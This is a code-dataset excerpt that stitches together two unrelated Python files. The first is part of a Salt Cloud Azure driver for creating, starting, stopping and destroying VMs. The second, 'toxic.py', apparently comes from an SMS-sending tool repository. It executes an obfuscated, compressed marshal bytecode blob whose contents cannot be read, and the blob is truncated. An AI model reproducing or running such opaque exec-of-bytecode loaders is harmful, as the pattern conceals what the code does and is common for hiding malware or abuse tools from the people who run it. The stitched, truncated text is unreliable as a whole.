'availability_set',
vm_,
__opts__,
search_global=False,
default=None
)
if availability_set is not None and isinstance(availability_set, six.string_types):
availability_set = {
'id': '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.Compute/availabilitySets/{2}'.format(
subscription_id,
vm_['resource_group'],
availability_set
)
}
else:
availability_set = None
cloud_env = _get_cloud_environment()
storage_endpoint_suffix = cloud_env.suffixes.storage_endpoint
if isinstance(vm_.get('volumes'), six.string_types):
volumes = salt.utils.yaml.safe_load(vm_['volumes'])
else:
volumes = vm_.get('volumes')
data_disks = None
if isinstance(volumes, list):
data_disks = []
else:
volumes = []
lun = 0
luns = []
for volume in volumes:
if isinstance(volume, six.string_types):
volume = {'name': volume}
volume.setdefault(
'name',
volume.get(
'name',
volume.get(
'name',
'{0}-datadisk{1}'.format(vm_['name'], six.text_type(lun))
)
)
)
volume.setdefault(
'disk_size_gb',
volume.get(
'logical_disk_size_in_gb',
volume.get('size', 100)
)
)
# Old kwarg was host_caching, new name is caching
volume.setdefault('caching', volume.get('host_caching', 'ReadOnly'))
while lun in luns:
lun += 1
if lun > 15:
log.error('Maximum lun count has been reached')
break
volume.setdefault('lun', lun)
lun += 1
# The default vhd is {vm_name}-datadisk{lun}.vhd
if 'media_link' in volume:
volume['vhd'] = VirtualHardDisk(volume['media_link'])
del volume['media_link']
elif volume.get('vhd') == 'unmanaged':
volume['vhd'] = VirtualHardDisk(
'https://{0}.blob.{1}/vhds/{2}-datadisk{3}.vhd'.format(
vm_['storage_account'],
storage_endpoint_suffix,
vm_['name'],
volume['lun'],
),
)
elif 'vhd' in volume:
volume['vhd'] = VirtualHardDisk(volume['vhd'])
if 'image' in volume:
volume['create_option'] = 'from_image'
elif 'attach' in volume:
volume['create_option'] = 'attach'
else:
volume['create_option'] = 'empty'
data_disks.append(DataDisk(**volume))
img_ref = None
if vm_['image'].startswith('http') or vm_.get('vhd') == 'unmanaged':
if vm_['image'].startswith('http'):
source_image = VirtualHardDisk(vm_['image'])
else:
source_image = None
if '|' in vm_['image']:
img_pub, img_off, img_sku, img_ver = vm_['image'].split('|')
img_ref = ImageReference(
publisher=img_pub,
offer=img_off,
sku=img_sku,
version=img_ver,
)
elif vm_['image'].startswith('/subscriptions'):
img_ref = ImageReference(id=vm_['image'])
if win_installer:
os_type = 'Windows'
else:
os_type = 'Linux'
os_disk = OSDisk(
caching=CachingTypes.none,
create_option=DiskCreateOptionTypes.from_image,
name=disk_name,
vhd=VirtualHardDisk(
'https://{0}.blob.{1}/vhds/{2}.vhd'.format(
vm_['storage_account'],
storage_endpoint_suffix,
disk_name,
),
),
os_type=os_type,
image=source_image,
disk_size_gb=vm_.get('os_disk_size_gb')
)
else:
source_image = None
os_type = None
os_disk = OSDisk(
create_option=DiskCreateOptionTypes.from_image,
disk_size_gb=vm_.get('os_disk_size_gb')
)
if '|' in vm_['image']:
img_pub, img_off, img_sku, img_ver = vm_['image'].split('|')
img_ref = ImageReference(
publisher=img_pub,
offer=img_off,
sku=img_sku,
version=img_ver,
)
elif vm_['image'].startswith('/subscriptions'):
img_ref = ImageReference(id=vm_['image'])
userdata_file = config.get_cloud_config_value(
'userdata_file', vm_, __opts__, search_global=False, default=None
)
userdata = config.get_cloud_config_value(
'userdata', vm_, __opts__, search_global=False, default=None
)
userdata_template = config.get_cloud_config_value(
'userdata_template', vm_, __opts__, search_global=False, default=None
)
if userdata_file:
if os.path.exists(userdata_file):
with salt.utils.files.fopen(userdata_file, 'r') as fh_:
userdata = fh_.read()
if userdata and userdata_template:
userdata_sendkeys = config.get_cloud_config_value(
'userdata_sendkeys', vm_, __opts__, search_global=False, default=None
)
if userdata_sendkeys:
vm_['priv_key'], vm_['pub_key'] = salt.utils.cloud.gen_keys(
config.get_cloud_config_value(
'keysize',
vm_,
__opts__
)
)
key_id = vm_.get('name')
if 'append_domain' in vm_:
key_id = '.'.join([key_id, vm_['append_domain']])
salt.utils.cloud.accept_key(
__opts__['pki_dir'], vm_['pub_key'], key_id
)
userdata = salt.utils.cloud.userdata_template(__opts__, vm_, userdata)
custom_extension = None
if userdata is not None or userdata_file is not None:
try:
if win_installer:
publisher = 'Microsoft.Compute'
virtual_machine_extension_type = 'CustomScriptExtension'
type_handler_version = '1.8'
if userdata_file and userdata_file.endswith('.ps1'):
command_prefix = 'powershell -ExecutionPolicy Unrestricted -File '
else:
command_prefix = ''
else:
publisher = 'Microsoft.Azure.Extensions'
virtual_machine_extension_type = 'CustomScript'
type_handler_version = '2.0'
command_prefix = ''
settings = {}
if userdata:
settings['commandToExecute'] = userdata
elif userdata_file.startswith('http'):
settings['fileUris'] = [userdata_file]
settings['commandToExecute'] = command_prefix + './' + userdata_file[userdata_file.rfind('/')+1:]
custom_extension = {
'resource_group': vm_['resource_group'],
'virtual_machine_name': vm_['name'],
'extension_name': vm_['name'] + '_custom_userdata_script',
'location': vm_['location'],
'publisher': publisher,
'virtual_machine_extension_type': virtual_machine_extension_type,
'type_handler_version': type_handler_version,
'auto_upgrade_minor_version': True,
'settings': settings,
'protected_settings': None
}
except Exception as exc:
log.exception('Failed to encode userdata: %s', exc)
params = VirtualMachine(
location=vm_['location'],
plan=None,
hardware_profile=HardwareProfile(
vm_size=getattr(
VirtualMachineSizeTypes, vm_['size'].lower()
),
),
storage_profile=StorageProfile(
os_disk=os_disk,
data_disks=data_disks,
image_reference=img_ref,
),
os_profile=OSProfile(
admin_username=vm_username,
computer_name=vm_['name'],
**os_kwargs
),
network_profile=NetworkProfile(
network_interfaces=[
NetworkInterfaceReference(vm_['iface_id']),
],
),
availability_set=availability_set,
)
__utils__['cloud.fire_event'](
'event',
'requesting instance',
'salt/cloud/{0}/requesting'.format(vm_['name']),
args=__utils__['cloud.filter_event'](
'requesting',
vm_,
['name', 'profile', 'provider', 'driver']
),
sock_dir=__opts__['sock_dir'],
transport=__opts__['transport']
)
try:
vm_create = compconn.virtual_machines.create_or_update(
resource_group_name=vm_['resource_group'],
vm_name=vm_['name'],
parameters=params
)
vm_create.wait()
vm_result = vm_create.result()
vm_result = vm_result.as_dict()
if custom_extension:
create_or_update_vmextension(kwargs=custom_extension)
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('compute', exc.message)
vm_result = {}
return vm_result
def create(vm_):
'''
Create a single VM from a data dict.
'''
try:
if vm_['profile'] and config.is_profile_configured(
__opts__,
__active_provider_name__ or 'azurearm',
vm_['profile'],
vm_=vm_
) is False:
return False
except AttributeError:
pass
if vm_.get('bootstrap_interface') is None:
vm_['bootstrap_interface'] = 'public'
__utils__['cloud.fire_event'](
'event',
'starting create',
'salt/cloud/{0}/creating'.format(vm_['name']),
args=__utils__['cloud.filter_event'](
'creating', vm_, ['name', 'profile', 'provider', 'driver']
),
sock_dir=__opts__['sock_dir'],
transport=__opts__['transport']
)
__utils__['cloud.cachedir_index_add'](
vm_['name'], vm_['profile'], 'azurearm', vm_['driver']
)
if not vm_.get('location'):
vm_['location'] = get_location(kwargs=vm_)
log.info('Creating Cloud VM %s in %s', vm_['name'], vm_['location'])
vm_request = request_instance(vm_=vm_)
if not vm_request or 'error' in vm_request:
err_message = 'Error creating VM {0}! ({1})'.format(vm_['name'], six.text_type(vm_request))
log.error(err_message)
raise SaltCloudSystemExit(err_message)
def _query_node_data(name, bootstrap_interface):
'''
Query node data.
'''
data = show_instance(name, call='action')
ip_address = None
if len(data.keys()) == 0:
return False
if bootstrap_interface == 'public':
ip_address = data['public_ips'][0]
if bootstrap_interface == 'private':
ip_address = data['private_ips'][0]
if ip_address is None:
return False
return ip_address
try:
data = salt.utils.cloud.wait_for_ip(
_query_node_data,
update_args=(vm_['name'], vm_['bootstrap_interface'],),
timeout=config.get_cloud_config_value(
'wait_for_ip_timeout', vm_, __opts__, default=10 * 60),
interval=config.get_cloud_config_value(
'wait_for_ip_interval', vm_, __opts__, default=10),
interval_multiplier=config.get_cloud_config_value(
'wait_for_ip_interval_multiplier', vm_, __opts__, default=1),
)
except (
SaltCloudExecutionTimeout,
SaltCloudExecutionFailure,
SaltCloudSystemExit
) as exc:
try:
log.warning(exc)
finally:
raise SaltCloudSystemExit(six.text_type(exc))
vm_['ssh_host'] = data
if not vm_.get('ssh_username'):
vm_['ssh_username'] = config.get_cloud_config_value(
'ssh_username', vm_, __opts__
)
vm_['password'] = config.get_cloud_config_value(
'ssh_password', vm_, __opts__
)
ret = __utils__['cloud.bootstrap'](vm_, __opts__)
data = show_instance(vm_['name'], call='action')
log.info('Created Cloud VM \'%s\'', vm_['name'])
log.debug(
'\'%s\' VM creation details:\n%s',
vm_['name'],
pprint.pformat(data)
)
ret.update(data)
__utils__['cloud.fire_event'](
'event',
'created instance',
'salt/cloud/{0}/created'.format(vm_['name']),
args=__utils__['cloud.filter_event'](
'created',
vm_, ['name', 'profile', 'provider', 'driver']
),
sock_dir=__opts__['sock_dir'],
transport=__opts__['transport']
)
return ret
def destroy(name, call=None, kwargs=None): # pylint: disable=unused-argument
'''
Destroy a VM.
CLI Examples:
.. code-block:: bash
salt-cloud -d myminion
salt-cloud -a destroy myminion service_name=myservice
'''
if kwargs is None:
kwargs = {}
if call == 'function':
raise SaltCloudSystemExit(
'The destroy action must be called with -d, --destroy, '
'-a or --action.'
)
compconn = get_conn(client_type='compute')
node_data = show_instance(name, call='action')
if node_data['storage_profile']['os_disk'].get('managed_disk'):
vhd = node_data['storage_profile']['os_disk']['managed_disk']['id']
else:
vhd = node_data['storage_profile']['os_disk']['vhd']['uri']
ret = {name: {}}
log.debug('Deleting VM')
result = compconn.virtual_machines.delete(node_data['resource_group'], name)
result.wait()
if __opts__.get('update_cachedir', False) is True:
__utils__['cloud.delete_minion_cachedir'](
name,
__active_provider_name__.split(':')[0],
__opts__
)
cleanup_disks = config.get_cloud_config_value(
'cleanup_disks',
get_configured_provider(),
__opts__,
search_global=False,
default=False,
)
if cleanup_disks:
cleanup_vhds = kwargs.get(
'delete_vhd',
config.get_cloud_config_value(
'cleanup_vhds',
get_configured_provider(),
__opts__,
search_global=False,
default=False
)
)
if cleanup_vhds:
log.debug('Deleting vhd')
comps = vhd.split('/')
container = comps[-2]
blob = comps[-1]
ret[name]['delete_disk'] = {
'delete_disks': cleanup_disks,
'delete_vhd': cleanup_vhds,
'container': container,
'blob': blob,
}
if vhd.startswith('http'):
ret[name]['data'] = delete_blob(
kwargs={'container': container, 'blob': blob},
call='function'
)
else:
ret[name]['data'] = delete_managed_disk(
kwargs={'resource_group': node_data['resource_group'],
'container': container,
'blob': blob},
call='function'
)
cleanup_data_disks = kwargs.get(
'delete_data_disks',
config.get_cloud_config_value(
'cleanup_data_disks',
get_configured_provider(),
__opts__,
search_global=False,
default=False
)
)
if cleanup_data_disks:
log.debug('Deleting data_disks')
ret[name]['data_disks'] = {}
for disk in node_data['storage_profile']['data_disks']:
datavhd = disk.get('managed_disk', {}).get('id') or disk.get('vhd', {}).get('uri')
comps = datavhd.split('/')
container = comps[-2]
blob = comps[-1]
ret[name]['data_disks'][disk['name']] = {
'delete_disks': cleanup_disks,
'delete_vhd': cleanup_vhds,
'container': container,
'blob': blob,
}
if datavhd.startswith('http'):
ret[name]['data'] = delete_blob(
kwargs={'container': container, 'blob': blob},
call='function'
)
else:
ret[name]['data'] = delete_managed_disk(
kwargs={'resource_group': node_data['resource_group'],
'container': container,
'blob': blob},
call='function'
)
cleanup_interfaces = config.get_cloud_config_value(
'cleanup_interfaces',
get_configured_provider(),
__opts__,
search_global=False,
default=False
)
if cleanup_interfaces:
ret[name]['cleanup_network'] = {
'cleanup_interfaces': cleanup_interfaces,
'resource_group': node_data['resource_group'],
'data': [],
}
ifaces = node_data['network_profile']['network_interfaces']
for iface in ifaces:
resource_group = iface['id'].split('/')[4]
ret[name]['cleanup_network']['data'].append(
delete_interface(
kwargs={
'resource_group': resource_group,
'iface_name': iface['name'],
},
call='function',
)
)
return ret
def list_storage_accounts(call=None):
'''
List storage accounts within the subscription.
'''
if call == 'action':
raise SaltCloudSystemExit(
'The list_storage_accounts function must be called with '
'-f or --function'
)
storconn = get_conn(client_type='storage')
ret = {}
try:
accounts_query = storconn.storage_accounts.list()
accounts = __utils__['azurearm.paged_object_to_list'](accounts_query)
for account in accounts:
ret[account['name']] = account
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('storage', exc.message)
ret = {'Error': exc.message}
return ret
def _get_cloud_environment():
'''
Get the cloud environment object.
'''
cloud_environment = config.get_cloud_config_value(
'cloud_environment',
get_configured_provider(), __opts__, search_global=False
)
try:
cloud_env_module = importlib.import_module('msrestazure.azure_cloud')
cloud_env = getattr(cloud_env_module, cloud_environment or 'AZURE_PUBLIC_CLOUD')
except (AttributeError, ImportError):
raise SaltCloudSystemExit(
'The azure {0} cloud environment is not available.'.format(cloud_environment)
)
return cloud_env
def _get_block_blob_service(kwargs=None):
'''
Get the block blob storage service.
'''
resource_group = kwargs.get('resource_group') or config.get_cloud_config_value(
'resource_group',
get_configured_provider(), __opts__, search_global=False
)
sas_token = kwargs.get('sas_token') or config.get_cloud_config_value(
'sas_token',
get_configured_provider(), __opts__, search_global=False
)
storage_account = kwargs.get('storage_account') or config.get_cloud_config_value(
'storage_account',
get_configured_provider(), __opts__, search_global=False
)
storage_key = kwargs.get('storage_key') or config.get_cloud_config_value(
'storage_key',
get_configured_provider(), __opts__, search_global=False
)
if not resource_group:
raise SaltCloudSystemExit(
'A resource group must be specified'
)
if not storage_account:
raise SaltCloudSystemExit(
'A storage account must be specified'
)
if not storage_key:
storconn = get_conn(client_type='storage')
storage_keys = storconn.storage_accounts.list_keys(resource_group, storage_account)
storage_keys = {v.key_name: v.value for v in storage_keys.keys}
storage_key = next(six.itervalues(storage_keys))
cloud_env = _get_cloud_environment()
endpoint_suffix = cloud_env.suffixes.storage_endpoint
return BlockBlobService(storage_account, storage_key,
sas_token=sas_token,
endpoint_suffix=endpoint_suffix)
def list_blobs(call=None, kwargs=None): # pylint: disable=unused-argument
'''
List blobs.
'''
if kwargs is None:
kwargs = {}
if 'container' not in kwargs:
raise SaltCloudSystemExit(
'A container must be specified'
)
storageservice = _get_block_blob_service(kwargs)
ret = {}
try:
for blob in storageservice.list_blobs(kwargs['container']).items:
ret[blob.name] = {
'blob_type': blob.properties.blob_type,
'last_modified': blob.properties.last_modified.isoformat(),
'server_encrypted': blob.properties.server_encrypted,
}
except Exception as exc:
log.warning(six.text_type(exc))
return ret
def delete_blob(call=None, kwargs=None): # pylint: disable=unused-argument
'''
Delete a blob from a container.
'''
if kwargs is None:
kwargs = {}
if 'container' not in kwargs:
raise SaltCloudSystemExit(
'A container must be specified'
)
if 'blob' not in kwargs:
raise SaltCloudSystemExit(
'A blob must be specified'
)
storageservice = _get_block_blob_service(kwargs)
storageservice.delete_blob(kwargs['container'], kwargs['blob'])
return True
def delete_managed_disk(call=None, kwargs=None): # pylint: disable=unused-argument
'''
Delete a managed disk from a resource group.
'''
compconn = get_conn(client_type='compute')
try:
compconn.disks.delete(kwargs['resource_group'], kwargs['blob'])
except Exception as exc:
log.error('Error deleting managed disk %s - %s', kwargs.get('blob'), six.text_type(exc))
return False
return True
def list_virtual_networks(call=None, kwargs=None):
'''
List virtual networks.
'''
if kwargs is None:
kwargs = {}
if call == 'action':
raise SaltCloudSystemExit(
'The avail_sizes function must be called with '
'-f or --function'
)
netconn = get_conn(client_type='network')
resource_groups = list_resource_groups()
ret = {}
for group in resource_groups:
try:
networks = netconn.virtual_networks.list(
resource_group_name=group
)
except CloudError:
networks = {}
for network_obj in networks:
network = network_obj.as_dict()
ret[network['name']] = network
ret[network['name']]['subnets'] = list_subnets(
kwargs={'resource_group': group, 'network': network['name']}
)
return ret
def list_subnets(call=None, kwargs=None):
'''
List subnets in a virtual network.
'''
if kwargs is None:
kwargs = {}
if call == 'action':
raise SaltCloudSystemExit(
'The avail_sizes function must be called with '
'-f or --function'
)
netconn = get_conn(client_type='network')
resource_group = kwargs.get('resource_group') or config.get_cloud_config_value(
'resource_group',
get_configured_provider(), __opts__, search_global=False
)
if not resource_group and 'group' in kwargs and 'resource_group' not in kwargs:
resource_group = kwargs['group']
if not resource_group:
raise SaltCloudSystemExit(
'A resource group must be specified'
)
if kwargs.get('network') is None:
kwargs['network'] = config.get_cloud_config_value(
'network', get_configured_provider(), __opts__, search_global=False
)
if 'network' not in kwargs or kwargs['network'] is None:
raise SaltCloudSystemExit(
'A "network" must be specified'
)
ret = {}
subnets = netconn.subnets.list(resource_group, kwargs['network'])
for subnet in subnets:
ret[subnet.name] = subnet.as_dict()
ret[subnet.name]['ip_configurations'] = {}
for ip_ in subnet.ip_configurations:
comps = ip_.id.split('/')
name = comps[-1]
ret[subnet.name]['ip_configurations'][name] = ip_.as_dict()
ret[subnet.name]['ip_configurations'][name]['subnet'] = subnet.name
ret[subnet.name]['resource_group'] = resource_group
return ret
def create_or_update_vmextension(call=None, kwargs=None): # pylint: disable=unused-argument
'''
.. versionadded:: Fluorine
Create or update a VM extension object "inside" of a VM object.
required kwargs:
.. code-block:: yaml
extension_name: myvmextension
virtual_machine_name: myvm
settings: {"commandToExecute": "hostname"}
optional kwargs:
.. code-block:: yaml
resource_group: < inferred from cloud configs >
location: < inferred from cloud configs >
publisher: < default: Microsoft.Azure.Extensions >
virtual_machine_extension_type: < default: CustomScript >
type_handler_version: < default: 2.0 >
auto_upgrade_minor_version: < default: True >
protected_settings: < default: None >
'''
if kwargs is None:
kwargs = {}
if 'extension_name' not in kwargs:
raise SaltCloudSystemExit(
'An extension name must be specified'
)
if 'virtual_machine_name' not in kwargs:
raise SaltCloudSystemExit(
'A virtual machine name must be specified'
)
compconn = get_conn(client_type='compute')
# pylint: disable=invalid-name
VirtualMachineExtension = getattr(
compute_models, 'VirtualMachineExtension'
)
resource_group = kwargs.get('resource_group') or config.get_cloud_config_value(
'resource_group',
get_configured_provider(), __opts__, search_global=False
)
if not resource_group:
raise SaltCloudSystemExit(
'A resource group must be specified'
)
location = kwargs.get('location') or get_location()
if not location:
raise SaltCloudSystemExit(
'A location must be specified'
)
publisher = kwargs.get('publisher', 'Microsoft.Azure.Extensions')
virtual_machine_extension_type = kwargs.get('virtual_machine_extension_type', 'CustomScript')
type_handler_version = kwargs.get('type_handler_version', '2.0')
auto_upgrade_minor_version = kwargs.get('auto_upgrade_minor_version', True)
settings = kwargs.get('settings', {})
protected_settings = kwargs.get('protected_settings')
if not isinstance(settings, dict):
raise SaltCloudSystemExit(
'VM extension settings are not valid'
)
elif 'commandToExecute' not in settings and 'script' not in settings:
raise SaltCloudSystemExit(
'VM extension settings are not valid. Either commandToExecute or script must be specified.'
)
log.info('Creating VM extension %s', kwargs['extension_name'])
ret = {}
try:
params = VirtualMachineExtension(
location=location,
publisher=publisher,
virtual_machine_extension_type=virtual_machine_extension_type,
type_handler_version=type_handler_version,
auto_upgrade_minor_version=auto_upgrade_minor_version,
settings=settings,
protected_settings=protected_settings
)
poller = compconn.virtual_machine_extensions.create_or_update(
resource_group,
kwargs['virtual_machine_name'],
kwargs['extension_name'],
params
)
ret = poller.result()
ret = ret.as_dict()
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('compute', 'Error attempting to create the VM extension: {0}'.format(exc.message))
ret = {'error': exc.message}
return ret
def stop(name, call=None):
'''
.. versionadded:: Fluorine
Stop (deallocate) a VM
CLI Examples:
.. code-block:: bash
salt-cloud -a stop myminion
'''
if call == 'function':
raise SaltCloudSystemExit(
'The stop action must be called with -a or --action.'
)
compconn = get_conn(client_type='compute')
resource_group = config.get_cloud_config_value(
'resource_group',
get_configured_provider(), __opts__, search_global=False
)
ret = {}
if not resource_group:
groups = list_resource_groups()
for group in groups:
try:
instance = compconn.virtual_machines.deallocate(
vm_name=name,
resource_group_name=group
)
instance.wait()
vm_result = instance.result()
ret = vm_result.as_dict()
break
except CloudError as exc:
if 'was not found' in exc.message:
continue
else:
ret = {'error': exc.message}
if not ret:
__utils__['azurearm.log_cloud_error']('compute', 'Unable to find virtual machine with name: {0}'.format(name))
ret = {'error': 'Unable to find virtual machine with name: {0}'.format(name)}
else:
try:
instance = compconn.virtual_machines.deallocate(
vm_name=name,
resource_group_name=resource_group
)
instance.wait()
vm_result = instance.result()
ret = vm_result.as_dict()
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('compute', 'Error attempting to stop {0}: {1}'.format(name, exc.message))
ret = {'error': exc.message}
return ret
def start(name, call=None):
'''
.. versionadded:: Fluorine
Start a VM
CLI Examples:
.. code-block:: bash
salt-cloud -a start myminion
'''
if call == 'function':
raise SaltCloudSystemExit(
'The start action must be called with -a or --action.'
)
compconn = get_conn(client_type='compute')
resource_group = config.get_cloud_config_value(
'resource_group',
get_configured_provider(), __opts__, search_global=False
)
ret = {}
if not resource_group:
groups = list_resource_groups()
for group in groups:
try:
instance = compconn.virtual_machines.start(
vm_name=name,
resource_group_name=group
)
instance.wait()
vm_result = instance.result()
ret = vm_result.as_dict()
break
except CloudError as exc:
if 'was not found' in exc.message:
continue
else:
ret = {'error': exc.message}
if not ret:
__utils__['azurearm.log_cloud_error']('compute', 'Unable to find virtual machine with name: {0}'.format(name))
ret = {'error': 'Unable to find virtual machine with name: {0}'.format(name)}
else:
try:
instance = compconn.virtual_machines.start(
vm_name=name,
resource_group_name=resource_group
)
instance.wait()
vm_result = instance.result()
ret = vm_result.as_dict()
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('compute', 'Error attempting to start {0}: {1}'.format(name, exc.message))
ret = {'error': exc.message}
return ret
| 32.503318
| 128
| 0.582485
|
23b3a28a0aeac86092ba9f4c83f6710b7085a977
| 5,716
|
py
|
Python
|
toxic.py
|
TXVIRUS/TX_SMS
|
6715eaeef7cb87e0399c6eff0cb0537a9cee528b
|
[
"MIT"
] | null | null | null |
toxic.py
|
TXVIRUS/TX_SMS
|
6715eaeef7cb87e0399c6eff0cb0537a9cee528b
|
[
"MIT"
] | null | null | null |
toxic.py
|
TXVIRUS/TX_SMS
|
6715eaeef7cb87e0399c6eff0cb0537a9cee528b
|
[
"MIT"
] | null | null | null |
#Compiled By Mohammad Alamin
#https://github.com/AK27HBD/
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xee\x06\x00\x00x\x9c\x9dWM\x97\xaaH\x12\xdd\xf7\xafx\xe7\xcc\xa2\xbb7s\x00\xf5\xcd\xb0\x14,0Q,\x01I>vd\xa6\r\x08\x89L)(\xfc\xfa\x89\x04\xb5\xaa|S=\xddo\x91\xa7,L"#\xee\xbdq3\xfc\x87~\xe4u^\xee\xd97\xfb\x98%\x9c\'\xec\xdb\xbcLx^\xfd\x92\xf3\xfa\xf8v\xfeF\x92\xd3\xfe\xfb\xf4\x97\xfduO\x7f\x1b?\xff\x93|\x9f\xb2==\xb2\xfdo\xe4W\xd4\xd9\x07\xb1\xbc@\xbe\x90\x89%%\xc1\xacB/r\x1b/\xf1)\x0e\xedUr{\x8e\x96VIC\\\xd2\x89\xdb\xeb<\xee\x88"\xa5\x94\xe3+\x0bp\xcf\x96v\x03\xcf;\x16l$\x16\xc2\xbeN\xabI\xa8\xb5\xb4rRG1\xfa\xd8/\x1b\xaa`X\xa5\x94\x84q\xe9\x9a\xe5\x81\xcd\xeb"\x0e\xa2\x14\xce\x93(\xff\xf7q\xb5;\xae\x90\xaeq\x88\xf1\x86\x16R\xba\xd2-j/\xec>\xe8\x8ds\xb8\x98\xf7\xb6|\xeam.\xefv\xd8N\x9dB\xdd8\x05\xf6\xd0\x8b\x15#\xc3\xdd\x06/\xe5b\x8dc\xcb/\xf1.4g\xcb$t\x8f,@\xe9k\xae\x1d\xd9\xd2\xbd\xd0\xfe\xd8\xae\x15V33\x93\xa3|v\x80\xdc[ld\x81\x87-\xec\xcb\xd7\x06\x9bPk\xc0\xba(\x90\xee\xef\x9c\x86w&NC\x02\xbfe\xcbLIBK\xa6\xb0\xd7\x87\x1abo\xfe\x1d\x99\x99\xc4\x96\xf3\xef\xebN\x95\xf6\xcb\xb8\xa6\x15\xee\xd7\xdcx\x83\xcf\x19\xf3fgb\\\x1b\x97\x1b\x878\xb0Z\xa2\x9c>\xe72a\x13\xd6\xcdx\x14l\xca\x88\xabm\xd2\x8d9\xb1\x856M\x82\xcd\xe3\xac]\xa0\x1e\xa3@>G\x01\xe0\x18\\3\x12\x94\xcd\xdf\x8e\xd3\xa1Z\xcf\xe7)]Z5\xa9\x9cc\\\xe1C\xd2\x15\x02\xeb\x0b\xe5e\xc3\xf44G\xb9\xf8\x7f>\xac\xfb>T^\x1b\xf1\xfc\xc1\x8fS\x7f\xde?\xe8f\xb3\x8cC\xf7\xa6\x19\xe0x\x89%\xe0\xde\xa4\\=#\x03\xf7q\x88V\xa4\xc2\xe7\x88\xe3Np*4\xb22\xc7}\xef\xfcjw~\xaf\xc4\xc7\r3a\xaf\x11\xd7\xd1\xc4\xad\x89\xa7\xbd\xb2@\xce!\x0e\xe07\xcfW^\xb1\x02<Z\x069\x89x"\xb7\x0f\xf1\x0cR\xb9%\xcd\xb5\x1d\tA#\x8f}\xc7\x14\xf2\xad\xf5\xf4x\xb8k\x1d\x87\xd6\xc9vj\x99\xf2K\xba\xf5\xe6y\xb2t%\xba\xb4\x05\x97\x195\x8b\xc6\xdeig\x88-C.}\xa4d\xc0\xdf\xa5\x89\x14\xf5\xbcV\xaeg\xda\xc9\x19\x03}\xad\xc3MI+\xc8S\xf1\xdb(\xd4\xea\xf5$\x92\xd6\x8a\x01\xef\xa4-\x13\xdf\x15x\x9a\x84\x1b\xc0\x03\xad\x12\x13g1\xd4E\xbb\xb9\x8a^6\x19\xf4\x82E\xaaM\t\x0b4Y*\xb1\xefB\xbd\x8e\xc0\xf8\x18\x07F\x11\x87V\x1ft\xd6\x82(3)\x86\x1a\xd6\xd8\x9dQ\xd3\xcfC\x0f\xde\xd7\xad\x8c.\xb5\x13\xf0\x9b\xc1\xbb-\xc9\xd5\xffPEmPZ\x17Q\xe8f\x02\x17kr\xca!_\xc0\xd280\x1d}G:\xaaV\xcaL&\x01\xf4f~\xaaP~\xc9\xd9\xb2\xbc\xc4\x9e\xf8\xce\xba$\xa6\xda\xc4\x9e\xa5Z\x97\xe3\x8dW\xbb@\x13\xdc\x91\x05Z1\x81U>\x9c\xfbQwe\x94\xcb\x03V\x11h"V\xfc&\xaa\xf0\xf7}>\xe0\xd7\xb2\x03j\xc9\xc4\xbd\xac\'P#wr\x9dge\x14\x007\x95=\xe8\xe0KO\xd0\xd3\xfa\xe3\xde\x9f\xc5`\xcc\x97\xfd\x0bU\xda\x11\xde/\xd1Ah\xe04}\xd5\xe9\xdb]\x8f\xab\x8e\xe6\x7fxt\xa5\xe7\xf6M\x17\x1b\xa1\x87^\xafD\xdd\xf6\xb3.\xa0\xd3\xa8\xa8\xb5\xa5\xca\xa6\xa5\xe0\x17"\xe75\xdf\xb4\xc4SK8\xffD\xc0_\xe0o\x0f\xb9\x16\xeb@\x95\xe8B\x1dq\xddIp.\xfap.\xe2d\xa2\x95\x94\x1b\x12\x99 5\xe2\xceY`\x85\xd2\x07\xf6\x87\x11{g\xc0~\xa3?a\xaf\x18\x97\xc4\x9b\xe5PWE:\xb9\'\xcaU\x1e0\xa8\xec\x9bFG\r\x0e\x9aT\xaem\xac\x94\xcd\x8d\x87\xdb9\xef\x1a\x1bb\xffE=n\x8cS\xee\x0c\x9a\x82\x1e\xd5e\x7f\x1fj%*\xa5\x01\'8\xebB\x80?\xc0\xbe&\xca\xb4M*\xc0%G\xab\xd84\xa4h\xe7\x88=\xd5\xbe\xb3\x04n\x1d\xecii>\xe8.#\xe6%_\xeb\xf3\x9c\x84\x9b\x9a*n3\xf0tH\xa7Vwnn}\xfffu\x9fty\xc3\xc6\x1f\xb1\xf1~\xc0F\xd4\xde\xc4f\x06^i\xbcE\xe1\xe6\x08X_\x84?\xdd\xb8\x1a\xf4\xf9\x03\x0e\xde\xdf\xc0\x01\xff,\x0e\xfe\x1d\x87Q\x17\xfe\xbd\x1f\x87\xfe|{]\xa4\x9f{\xb4\x92*\xfd\x07MDc\xdd\xcf\xfd\xa8\xc42\xe1\xd03J:j\x80[\xc5\xa8\x13u\xf4*\x85\x01\xff\x03\xf6\xe5Nv\x9d\xed\xe4\xee]\xf8\x8fD\xc1\xb3\xad\xf7\xc1\xa3\xfa\x08\xf2\xd4\x16\x80]\xe9\x053\xa1\xe7\x1e\xee\xd3\x9aq\xfc\x02\xfd\x06>[\xbc\xef\x95\x7f\x16\x8b\xe8\x8e\xc5\x19\xfa\xbf\x8f\xcdi.\xfc\xfd\xff\xf3N\xc7\xfa\xbb\xff\xd9\x13]\x1c\xb8\xd3\x91\xe7Y\x1e\xeb\xaab{\xaa\x0c\x9cv\xa0\xff:\x06l\xa9\xfe\xb1N\xfa\xd7\xeb\xec\x19A\x05\xc4\x85\xfb\x05\xee\xc63\x1e\xbc\xd3b\xc2\xcb\x107.\xd4\xbc\x02\x96\x06\xdc\x83j\xb3Vj\xe8\xc9)x\x9e\x0b\xde\xf42\xb9\xfb1\xe1\xc6y\xf4\xdb\x1f\xbc8\xbd\xfb\xd4\xee~W\x0e~\xf5\xd9\xabD\x9f\x88Z\x18/\x0f7\xdf\x1e\xea\xbd\xe9\xe4\xf0\x19\xa7t\xc0\xe9\xf5\xd9;\xc6y\xa1O\x96\x0c\xfa`\xd6\xdez"\x84\x19E\xf3_\x8a\xd6\x91\xad\x8d\x03\xb5\x83\xb7\xdd}5\x88\x8